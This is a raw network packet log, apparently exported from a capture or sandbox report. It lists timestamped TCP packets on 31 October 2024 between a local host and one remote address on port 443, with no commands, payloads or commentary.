                                                  Oct 31, 2024 20:50:49.866875887 CET4435240513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.866945028 CET52405443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.866955996 CET4435240513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.867002010 CET4435240513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.867084980 CET52405443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.867330074 CET52405443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.867347956 CET4435240513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.867358923 CET52405443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.867364883 CET4435240513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.870537043 CET52410443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.870567083 CET4435241013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.870632887 CET52410443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.870788097 CET52410443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.870805025 CET4435241013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.907730103 CET4435240613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.907788038 CET4435240613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.907919884 CET52406443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.907965899 CET52406443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.907987118 CET4435240613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.907999039 CET52406443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.908005953 CET4435240613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.910365105 CET52411443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.910408020 CET4435241113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.910634041 CET52411443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.910761118 CET52411443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.910777092 CET4435241113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.914002895 CET4435240713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.914259911 CET4435240713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.914355040 CET52407443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.914385080 CET52407443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.914391994 CET4435240713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.914402008 CET52407443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.914406061 CET4435240713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.916286945 CET52412443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.916392088 CET4435241213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.916460991 CET52412443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.916585922 CET52412443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.916620970 CET4435241213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.970660925 CET4435240813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.971002102 CET4435240813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.971059084 CET52408443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.971148968 CET52408443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.971160889 CET4435240813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.971175909 CET52408443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.971179962 CET4435240813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.974370956 CET52413443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.974405050 CET4435241313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:49.974469900 CET52413443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.974692106 CET52413443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:49.974705935 CET4435241313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.294625998 CET4435240913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.295258999 CET52409443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.295281887 CET4435240913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.295734882 CET52409443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.295741081 CET4435240913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.430243969 CET4435240913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.430422068 CET4435240913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.430474997 CET52409443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.430944920 CET52409443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.430957079 CET4435240913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.430984974 CET52409443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.430989981 CET4435240913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.439359903 CET52414443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.439451933 CET4435241413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.439709902 CET52414443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.440092087 CET52414443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.440124035 CET4435241413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.638097048 CET4435241013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.643085003 CET52410443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.643107891 CET4435241013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.644021988 CET52410443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.644027948 CET4435241013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.653587103 CET4435241213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.662446976 CET52412443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.662477016 CET4435241213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.663790941 CET52412443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.663794994 CET4435241213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.745127916 CET4435241313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.745656967 CET52413443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.745692968 CET4435241313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.746372938 CET52413443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.746381998 CET4435241313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.762696028 CET4435241113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.763473034 CET52411443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.763501883 CET4435241113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.764528036 CET52411443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.764533997 CET4435241113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.776993990 CET4435241013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.777066946 CET4435241013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.777157068 CET52410443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.777396917 CET52410443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.777396917 CET52410443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.777412891 CET4435241013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.777421951 CET4435241013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.781014919 CET52415443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.781049967 CET4435241513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.781333923 CET52415443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.781682014 CET52415443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.781699896 CET4435241513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.792272091 CET4435241213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.792327881 CET4435241213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.792387962 CET52412443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.792656898 CET52412443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.792675018 CET4435241213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.792710066 CET52412443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.792715073 CET4435241213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.795770884 CET52416443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.795785904 CET4435241613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.795906067 CET52416443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.796154022 CET52416443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.796168089 CET4435241613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.882889986 CET4435241313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.883173943 CET4435241313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.883276939 CET52413443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.883831024 CET52413443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.883850098 CET4435241313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.883862019 CET52413443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.883867979 CET4435241313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.888081074 CET52417443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.888133049 CET4435241713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:50.888217926 CET52417443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.888454914 CET52417443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:50.888487101 CET4435241713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.182703972 CET4435241413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.183826923 CET52414443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.183877945 CET4435241413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.184757948 CET52414443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.184773922 CET4435241413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.313307047 CET4435241413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.313363075 CET4435241413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.313498974 CET52414443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.327112913 CET52414443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.327130079 CET4435241413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.327141047 CET52414443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.327146053 CET4435241413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.333884954 CET52418443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.333961964 CET4435241813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.334067106 CET52418443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.334311008 CET52418443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.334342957 CET4435241813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.380356073 CET4435241113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.380434036 CET4435241113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.380490065 CET52411443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.380768061 CET52411443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.380784988 CET4435241113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.384638071 CET52419443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.384677887 CET4435241913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.384824991 CET52419443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.385102034 CET52419443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.385134935 CET4435241913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.543129921 CET4435241513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.543581009 CET52415443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.543598890 CET4435241513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.544002056 CET52415443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.544008017 CET4435241513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.564560890 CET4435241613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.565043926 CET52416443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.565052986 CET4435241613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.565450907 CET52416443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.565454960 CET4435241613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.656652927 CET4435241713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.657254934 CET52417443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.657282114 CET4435241713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.657872915 CET52417443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.657886028 CET4435241713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.688235998 CET4435241513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.688374996 CET4435241513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.688452005 CET52415443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.688549995 CET52415443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.688568115 CET4435241513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.688580036 CET52415443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.688585997 CET4435241513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.691171885 CET52420443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.691207886 CET4435242013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.691374063 CET52420443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.691534996 CET52420443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.691545963 CET4435242013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.703491926 CET4435241613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.703521967 CET4435241613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.703562975 CET4435241613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.703613997 CET52416443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.703778028 CET52416443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.703778028 CET52416443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.703784943 CET4435241613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.703792095 CET4435241613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.705770016 CET52421443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.705804110 CET4435242113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.705964088 CET52421443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.706115961 CET52421443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.706130981 CET4435242113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.787544012 CET4435241713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.787761927 CET4435241713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.787827969 CET52417443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.787875891 CET52417443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.787875891 CET52417443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.787916899 CET4435241713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.787945986 CET4435241713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.789971113 CET52422443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.789990902 CET4435242213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:51.790242910 CET52422443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.790366888 CET52422443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:51.790376902 CET4435242213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.103447914 CET4435241813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.104584932 CET52418443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.104609966 CET4435241813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.105446100 CET52418443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.105452061 CET4435241813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.129343987 CET4435241913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.130395889 CET52419443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.130414963 CET4435241913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.131465912 CET52419443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.131474018 CET4435241913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.239434004 CET4435241813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.239464998 CET4435241813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.239502907 CET4435241813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.239535093 CET52418443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.239572048 CET52418443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.240551949 CET52418443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.240576029 CET4435241813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.240597963 CET52418443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.240603924 CET4435241813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.245371103 CET52423443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.245404959 CET4435242313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.245620966 CET52423443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.245877981 CET52423443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.245893955 CET4435242313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.259604931 CET4435241913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.259836912 CET4435241913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.259913921 CET52419443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.260034084 CET52419443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.260061026 CET4435241913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.260077953 CET52419443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.260087013 CET4435241913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.265847921 CET52424443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.265894890 CET4435242413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.266041040 CET52424443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.266206980 CET52424443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.266221046 CET4435242413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.447372913 CET4435242113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.448894024 CET52421443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.448909998 CET4435242113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.450501919 CET52421443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.450506926 CET4435242113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.456625938 CET4435242013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.457243919 CET52420443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.457263947 CET4435242013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.458142996 CET52420443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.458153009 CET4435242013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.522258997 CET4435242213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.523216963 CET52422443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.523225069 CET4435242213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.523757935 CET52422443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.523761988 CET4435242213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.591816902 CET4435242113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.591883898 CET4435242113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.592005014 CET52421443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.592278004 CET52421443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.592298985 CET4435242113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.592308998 CET52421443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.592314005 CET4435242113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.593703985 CET4435242013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.593841076 CET4435242013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.594194889 CET52420443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.594497919 CET52420443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.594515085 CET4435242013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.594599009 CET52420443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.594604969 CET4435242013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.598134995 CET52425443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.598176003 CET4435242513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.598241091 CET52425443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.599652052 CET52426443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.599689960 CET4435242613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.599772930 CET52426443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.600137949 CET52425443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.600153923 CET4435242513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.600526094 CET52426443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.600538969 CET4435242613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.671521902 CET4435242213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.671557903 CET4435242213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.671602011 CET4435242213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.671650887 CET52422443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.672426939 CET52422443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.672455072 CET4435242213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.672467947 CET52422443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.672473907 CET4435242213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.677087069 CET52427443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.677104950 CET4435242713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.677196026 CET52427443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.677617073 CET52427443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.677632093 CET4435242713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.991264105 CET4435242313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.991743088 CET52423443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.991769075 CET4435242313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:52.992207050 CET52423443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:52.992212057 CET4435242313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.007997990 CET4435242413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.008371115 CET52424443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.008399010 CET4435242413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.008747101 CET52424443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.008758068 CET4435242413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.122623920 CET4435242313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.122694969 CET4435242313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.122746944 CET52423443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.122931957 CET52423443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.122942924 CET4435242313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.122952938 CET52423443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.122957945 CET4435242313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.125710011 CET52428443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.125747919 CET4435242813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.125804901 CET52428443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.125957966 CET52428443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.125969887 CET4435242813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.151881933 CET4435242413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.151997089 CET4435242413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.152055025 CET52424443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.152132034 CET52424443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.152194977 CET52424443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.152194977 CET52424443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.152205944 CET4435242413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.152215004 CET4435242413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.154804945 CET52429443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.154911995 CET4435242913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.154994965 CET52429443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.155131102 CET52429443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.155168056 CET4435242913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.346466064 CET4435242513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.353101015 CET4435242613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.361155033 CET52425443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.361182928 CET4435242513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.372123003 CET52425443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.372134924 CET4435242513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.373480082 CET52426443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.373507023 CET4435242613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.374023914 CET52426443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.374028921 CET4435242613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.442720890 CET4435242713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.443238020 CET52427443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.443262100 CET4435242713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.443816900 CET52427443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.443820953 CET4435242713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.501102924 CET4435242513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.501214981 CET4435242513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.501286030 CET52425443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.501418114 CET52425443192.168.2.413.107.246.60
